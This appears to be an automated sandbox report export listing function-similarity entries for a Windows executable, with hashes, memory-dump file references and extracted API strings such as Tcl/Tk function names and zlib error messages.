                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                              • Instruction ID: a4ed867bf87904d30e02c5eb1282ea5cbfb8a4aeaac34864db7a2b02f9854bba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6741C23291864587EE349B29A94A27D77A0FF55BA0F140131EF8EC36D1DF6CE412CB52
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                                              • Opcode ID: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                                                                                                              • Instruction ID: d56928fdee3c987d9d3b57c350c916d8eab6ef25b33b240f49331e8f89baf7e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3021E721B186514AFE909B226C053FA9741BF46BE4FD84430EE0C87786CF7EE091C30A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                              • Instruction ID: 9cb15247dac7a13f397976ee6d40729d6faafa5835ea6b1d42d4fbaf85120410
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC318162A18A4285FF11AB558C4B37C2A90BF80BB4F424135EE5D873D2EFBCE4618713
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                                              • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                              • Instruction ID: f8195fba7d6a3d9f75d43c199d8ef3414ad42b3c16e21b38851ddd6e122addb8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE21A172E05B4589EF249FA4C89A2EC33A0FB14728F444636DB5C86AD9DF38D554C741
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction ID: bdbe6ada64360f091855be2812b099e18cc36867a8fad5b402d1b8833956a7bf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F119031A1C64282EE60AF119C0A27DA364BF85BA4F444431FF8CD7A96CF3DE4219706
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction ID: 9ef281fe64b46a4ebce0232347a78a9b5675b95fd3416e6abbc1af1c79661d40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A21B032A18A8186EF618F1CD84637976A0FB94BA4F144234EA5DC76D9DF7DD8118B01
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction ID: ed141f50c82a8031c967e7c792f1b6cc904d3698c3d3e6579489e03002e93b41
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B01C421B08B4580EE04DF529D0A0A9A791BF95FF0F488631EE5CD3BD6DE3CD4218345
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                              • Instruction ID: 6b4f7db01ce49ee54fd44e3a517c7467e27bc1c98e88ee9a8ca5ad0820b58f3d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F019E20E1D68340FEA46B256D4B1795390AF407F4F5446B5EE2CC36C6DF6CE461C243
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                              • Instruction ID: b3d43ffe6fe4e7b0c0babf657a772f4f5b0e0b8bf9e22f1ef65b48b17b8bd3d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70E01250E5C60787FE563AA84DCB17915205F993A0F504535EE09C62C3DD3C68759633
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,00000000,00007FF62C10B32A,?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A), ref: 00007FF62C10EBED
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                                              • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                              • Instruction ID: eff9d3abf8d5232ad9977fcb4cb0c331c2c0cecbe3f15fb73027e239cd93ba5e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F09054B2928780FE59A76B9C5F3B402805F99BB0F4C8530CD4FC63C2EE5CE4A18212
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF62C100C90,?,?,?,00007FF62C1022FA,?,?,?,?,?,00007FF62C103AE9), ref: 00007FF62C10D63A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction ID: a39ba22ef69299ae5797ac6fb7022814a1b6883c9326e92b67ad90b9cd67a3ad
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AF08C10F1824380FE653B715C5B2B412904FD4BB0F480730EC2EC62C2EE2EA4A28612
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                              • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                              • Instruction ID: 9b42112f5a6de7e26e6b0482f864bc7eddc8e5a0b83c699868f5fd35e10688a3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D02C664A0DB17D9FE15EB5DBC1A5B82375AF28774F540035D82E82660FFBCB1898207
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                              • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                              • Instruction ID: b1430b918680b9ee3500619412563b125569eb84f740ef50d30eb529adeea469
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CB2F872A182928BEB25CF68D84A7FD37A1FB64798F405135DA0D97A84DFBCE500CB41
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                              • API String ID: 0-2665694366
                                                                                                                                                                                                                                              • Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                                                                                                              • Instruction ID: 319f4cf9aab1d11b8fee948e4f36158f9372da558f9970dbbdb0976506d608d7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3052F672A186A64BDBA48F15C858B7D3BADFB44350F014139EA4AC7780DF3ED884CB45
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction ID: beaedb28620dca0820e320a6e2c27a3ce8439a0329a40f4e22887220335bbebd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85313D72608B818AEB609F64EC843EE7364FB94758F44403ADA4E87B98DF7CD548C715
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
